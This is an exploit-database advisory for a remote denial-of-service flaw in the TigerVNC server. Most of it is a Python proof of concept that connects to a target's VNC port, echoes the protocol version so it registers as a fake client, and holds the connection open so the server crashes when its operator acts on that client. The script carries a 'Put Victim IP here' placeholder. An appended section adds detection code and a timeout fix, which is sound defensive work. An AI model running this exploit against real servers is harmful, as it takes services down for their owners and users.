TigerVNC Server Remote DoS Vulnerability

2013-07-29T00:00:00
ID 1337DAY-ID-21040
Type zdt
Reporter Z3r0n3
Modified 2013-07-29T00:00:00

Description

TigerVNC is an advanced VNC implementation. It is based on the fourth generation of VNC. TigerVNC also includes features from the TightVNC and TurboVNC projects. This includes accelerated JPEG compression. TigerVNC supports the latest X.Org X server.

                                        
#!/usr/bin/env python
#================================================================#
# [+] Title: TigerVNC Server Remote DoS Vulnerability            #
# [+] Discovered: 28/07/2013                                     #
# [+] Software Vendor: http://sourceforge.net/projects/tigervnc/ #
# [+] Author: Z3r0n3 - Independent Security Researcher           #
# [+] Contact: [email protected]                                   #
# [+] Overview:                                                  #
#   A remote attacker can crash TigerVNC server by creating      #
#   a fake client. After registering the client, any control     #
#   the server tries to do (View-only, Full control...) on the   #
#   client can bring the server down (No one plays with clients!)#
#================================================================#

import socket
import sys

def SrvRecv():
    # Read the server's greeting (the RFB ProtocolVersion string).
    global srvmsg
    srvmsg = client.recv(1024)
    print("[<-] Srv: ", srvmsg)

host = "localhost"  # Put Victim IP here
port = 5900

print("[+] Creating socket...")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print("[+] Trying to connect with TigerVNC server...")
    client.connect((host, port))
except socket.error:
    print("[!] Can't connect...")
    client.close()
    sys.exit()

print("[x] Connected...")
SrvRecv()
# Echo the version string back so the server registers this connection as a client.
client.send(srvmsg)  # srvmsg="RFB XXX.XXX"

print("""[x] Go to TigerVNC server and click on Full control to obtain a full crash""")
# Hold the connection open until the operator acts on the client entry.
x = input("[x] Don't press anything till the server is down")
client.close()
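
For defenders, the pattern in the overview (a client that returns the 12-byte RFB ProtocolVersion string and then stays silent) can be picked out of per-connection data. This is an added example, not part of the original advisory; the session records, their field names and the 30-second idle threshold are constructed assumptions.

```python
import re

# RFB ProtocolVersion is exactly 12 bytes: "RFB xxx.yyy\n" (RFC 6143).
VERSION_RE = re.compile(rb"RFB (\d{3})\.(\d{3})\n")
VERSION_LEN = 12


def handshake_stage(client_bytes):
    """Classify how far a client got, from the bytes it has sent so far."""
    if len(client_bytes) < VERSION_LEN:
        return "incomplete-version"
    if not VERSION_RE.fullmatch(client_bytes[:VERSION_LEN]):
        return "malformed-version"
    if len(client_bytes) == VERSION_LEN:
        # Version returned, but no security-type choice, auth response
        # or ClientInit followed, which every real viewer sends next.
        return "version-only"
    return "past-version"


def stalled_clients(sessions, max_idle=30.0):
    """Return ids of sessions idle longer than max_idle right after ProtocolVersion."""
    return [
        s["id"]
        for s in sessions
        if handshake_stage(s["client_bytes"]) == "version-only"
        and s["idle_seconds"] > max_idle
    ]


# Constructed sample records (hypothetical fields, e.g. exported by a
# proxy or packet capture placed in front of port 5900).
SAMPLE_SESSIONS = [
    # Normal viewer: version, security type 1 (None), ClientInit.
    {"id": "conn-1", "client_bytes": b"RFB 003.008\n\x01\x01", "idle_seconds": 2.0},
    # Version echoed, then silence: the pattern described in the overview.
    {"id": "conn-2", "client_bytes": b"RFB 003.008\n", "idle_seconds": 120.0},
    # Version only, but still inside the grace period.
    {"id": "conn-3", "client_bytes": b"RFB 003.008\n", "idle_seconds": 1.5},
    # Non-RFB traffic hitting the port.
    {"id": "conn-4", "client_bytes": b"GET / HTTP", "idle_seconds": 90.0},
]

if __name__ == "__main__":
    for sid in stalled_clients(SAMPLE_SESSIONS):
        print("stalled after ProtocolVersion:", sid)
```

A server-side handshake timeout that drops such connections removes the half-registered client entry before anyone can act on it.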
